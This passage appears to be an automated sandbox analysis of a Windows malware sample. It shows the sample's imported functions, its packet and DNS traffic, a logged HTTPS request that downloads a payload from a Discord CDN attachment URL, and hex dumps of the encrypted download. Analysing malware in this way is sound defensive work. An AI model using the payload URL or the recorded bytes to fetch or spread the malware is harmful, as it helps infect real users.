IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemAlloc, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
winspool.drv	OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
comdlg32.dll	PrintDlgA, GetSaveFileNameA, GetOpenFileNameA
uRL	InetIsOffline

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2021 17:51:50.746925116 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:50.746973991 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:50.747046947 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:50.756189108 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:50.756227016 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:50.805953026 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:50.806113005 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.097635984 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.097661972 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.098063946 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.098184109 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.102875948 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.135827065 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.135921001 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.135935068 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.135977983 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.135982037 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.135993958 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136030912 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.136039019 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136071920 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136081934 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.136086941 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136120081 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136125088 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.136132002 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136161089 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.136182070 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.136827946 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136897087 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.136904955 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136936903 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136945009 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.136950016 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.136996984 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.138175011 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.138252020 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.138501883 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.138566971 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.138581038 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.138622999 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.138633013 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.138638973 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.138667107 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.138704062 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.138926029 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.138987064 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.138997078 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.139046907 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.139326096 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.139391899 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.139615059 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.139691114 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.139700890 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.139744997 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.139764071 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.139770985 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.139801979 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.139805079 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.139841080 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.139847040 CEST	443	49821	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.139888048 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.142812967 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.142841101 CEST	49821	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.146361113 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.146424055 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.146567106 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.147566080 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.147619963 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.187130928 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.187303066 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.188441038 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.195431948 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.195529938 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.240665913 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.240780115 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.240827084 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.240829945 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.240866899 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.240868092 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.240880966 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.240933895 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.240940094 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.240953922 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.240992069 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.241023064 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243573904 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243659973 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243668079 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243685007 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243716002 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243746996 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243762016 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243777990 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243810892 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243839979 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243844032 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243854046 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243885994 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243913889 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243925095 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243937016 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.243966103 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.243974924 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.244009018 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.244016886 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.244028091 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.244049072 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.244091988 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.244102955 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.244151115 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.244441032 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.244515896 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.244520903 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.244537115 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.244570017 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.244613886 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.244622946 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.244673967 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.245106936 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.245187998 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.245189905 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.245206118 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.245240927 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.245287895 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.246073961 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.246140003 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.246187925 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.246212959 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.246223927 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.246267080 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.256637096 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.256728888 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.256767035 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.256803989 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.256818056 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.256840944 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.256855965 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.256890059 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.256891012 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.256910086 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.256923914 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.256952047 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.256992102 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.256999969 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.257046938 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.257733107 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.257838011 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.257860899 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.257937908 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.257951021 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.257968903 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.258012056 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.258064032 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.259557009 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.259609938 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.259677887 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.259702921 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.259716988 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.259784937 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.259979963 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.260067940 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.260859013 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.260966063 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.261760950 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.261811018 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.261856079 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.261876106 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.261948109 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.262527943 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.262607098 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.262689114 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.263470888 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.263547897 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.264344931 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.264434099 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.265244961 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.265297890 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.265379906 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.265398979 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.265454054 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.272552013 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.272733927 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.273868084 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.273955107 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.274009943 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.274039984 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.274054050 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.274097919 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.275522947 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.275579929 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.275609970 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.275634050 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.275655985 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.275679111 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.275907993 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.275963068 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.276004076 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.276024103 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.276046991 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.276079893 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.276886940 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.276979923 CEST	443	49822	162.159.130.233	192.168.2.3
Oct 8, 2021 17:51:51.277112961 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.277214050 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.334764004 CEST	49822	443	192.168.2.3	162.159.130.233
Oct 8, 2021 17:51:51.334803104 CEST	443	49822	162.159.130.233	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2021 17:51:50.713258028 CEST	53777	53	192.168.2.3	8.8.8.8
Oct 8, 2021 17:51:50.733095884 CEST	53	53777	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 8, 2021 17:51:50.713258028 CEST	192.168.2.3	8.8.8.8	0xa2a4	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Oct 8, 2021 17:51:50.733095884 CEST	8.8.8.8	192.168.2.3	0xa2a4	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Oct 8, 2021 17:51:50.733095884 CEST	8.8.8.8	192.168.2.3	0xa2a4	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Oct 8, 2021 17:51:50.733095884 CEST	8.8.8.8	192.168.2.3	0xa2a4	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Oct 8, 2021 17:51:50.733095884 CEST	8.8.8.8	192.168.2.3	0xa2a4	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Oct 8, 2021 17:51:50.733095884 CEST	8.8.8.8	192.168.2.3	0xa2a4	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49821	162.159.130.233	443	C:\Users\user\Desktop\hTu8FeYy28.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 15:51:51 UTC	0	OUT	GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1 User-Agent: lVali Host: cdn.discordapp.com
2021-10-08 15:51:51 UTC	0	IN	HTTP/1.1 200 OK Date: Fri, 08 Oct 2021 15:51:51 GMT Content-Type: application/octet-stream Content-Length: 128000 Connection: close CF-Ray: 69b088706a5e4a56-FRA Accept-Ranges: bytes Age: 17634 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Lnouxqkbbgkvxwmwtigvjxpvnenadlc ETag: "f82884cc5e7cf22e9702adbfc1f12bee" Expires: Sat, 08 Oct 2022 15:51:51 GMT Last-Modified: Fri, 08 Oct 2021 10:04:29 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1633687469505069 x-goog-hash: crc32c=JdV9Ug== x-goog-hash: md5=+CiEzF588i6XAq2/wfEr7g== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 128000 X-GUploader-UploadID: ADPycds0RnBpdJc_kVb2ENhqI_yORFMxXLMJ15oMSy2oDomj2hdfbHrpnzEnkEQU2Z1XjrrhjyYlI7T2bH5p-XkQ2X4 X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-10-08 15:51:51 UTC	1	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4f 4b 78 4e 53 6b 47 4f 31 41 49 38 41 74 53 4f 7a 73 54 56 76 61 47 64 47 62 6c 46 6b 4a 39 6e 77 67 35 45 70 51 30 30 45 57 65 30 55 75 54 6e 76 46 59 77 44 71 61 38 32 4b 47 66 6b 70 7a 64 41 7a 30 35 64 54 68 4e 4f 58 44 4e 73 45 73 75 55 35 70 66 6b 4b 51 41 34 6d 75 68 79 53 65 31 43 78 4d 55 73 6a 45 4e 39 32 4c 25 32 46 36 68 7a 64 37 6d 4a 50 48 51 41 55 46 68 38 57 36 45 67 59 4e 72 79 64 6f 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OKxNSkGO1AI8AtSOzsTVvaGdGblFkJ9nwg5EpQ00EWe0UuTnvFYwDqa82KGfkpzdAz05dThNOXDNsEsuU5pfkKQA4muhySe1CxMUsjEN92L%2F6hzd7mJPHQAUFh8W6EgYNrydoQ%3D%3D"}],"group":"cf-nel","max_age":6048
2021-10-08 15:51:51 UTC	1	IN	Data Raw: 05 15 39 9e 06 9a 71 11 2a 6b 17 25 c6 e5 22 5e e3 23 d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ab b1 8c 76 80 96 7e a6 06 b2 16 a8 09 34 10 dc e7 29 ff f2 59 34 16 a9 8e 74 f9 ac 53 7b 3f b2 22 32 14 91 cd 67 65 6f 09 34 12 a3 9e 27 c7 76 b2 1d d9 7f 47 a8 0d 3c 03 63 67 6e 9c 52 ae 58 a9 aa 0c 8d c9 0c c8 c3 75 0b 38 1b df 31 eb 29 fb c7 40 0d 36 28 74 ec cd 6b 10 b5 ac 4c 28 75 0d 0a f8 2a 1a 72 8a 7e a4 75 75 3b bc de 83 d7 12 91 cd 63 61 7c 96 4a 25 cd 5c f1 b9 32 66 ec a4 05 7e a0 15 2a 45 ce 85 b5 8f cf 58 c9 0c c8 c3 75 0b 38 1b df 31 eb 29 fb c7 40 0d 36 28 74 ec cd 6b 10 b5 ac 4c 28 75 0d 0a f8 2a 1a 72 8a 7e a4 75 75 3b bc de 83 d7 12 91 Data Ascii: 9qk%"^#T4o$XmL5856Mv~4)Y4tS{?"2geo4'vG<cgnRXu81)@6(tkL(ur~uu;ca\|J%\2f~EXu81)@6(tkL(u*r~uu;
2021-10-08 15:51:51 UTC	2	IN	Data Raw: 05 7e 6e c2 61 4e db 64 6c 96 8c 79 4c 0d 0e 8f ad f8 f3 ec 97 81 b9 53 a9 ac 1e 70 b4 18 d8 dd cb 78 8b e4 2c a6 7e d5 38 11 30 45 f7 3b b6 11 14 35 66 97 c2 b2 1e 57 67 32 b8 d3 29 98 fd fa b9 78 95 d9 11 3a 3e 48 5c 83 ee 25 b9 0a a4 2d 29 6e d5 76 ed fe 4e df 22 54 6d 29 c2 f1 af c1 9c 25 a0 15 22 67 0f 92 1f f8 47 da f3 fe 7a b6 29 87 99 e9 1a 5e df 66 40 06 b6 15 06 bb 70 b4 2f df 72 c0 cd 67 64 c8 e0 07 40 0c bb 2c 00 e2 b1 b5 a6 22 06 1c 29 f5 b9 4b 0d 0b 3d 8a 3e 7c dc bc d0 dd 24 0d 54 d6 a6 2b 94 d7 69 1b ef a8 75 2b fe 71 38 7c fd aa 32 67 16 bd ec ad bc d5 31 93 80 a9 81 2b 8f 80 f8 7c a2 64 f8 f7 ec a7 b0 10 c4 e6 b5 97 dc a7 c3 cb 4c 15 54 c8 54 d4 9a 55 22 6d 6d 27 fa 45 db 8c 10 4e 87 56 f9 f7 ef c3 ee 40 05 3b e3 43 92 49 95 ff 80 f7 4a Data Ascii: ~naNdlyLSpx,~80E;5fWg2)x:>H\%-)nvN"Tm)%"gGz)^f@p/rgd@,")K=>\|$T+iu+q8\|2g1+\|dLTTU"mm'ENV@;CIJ
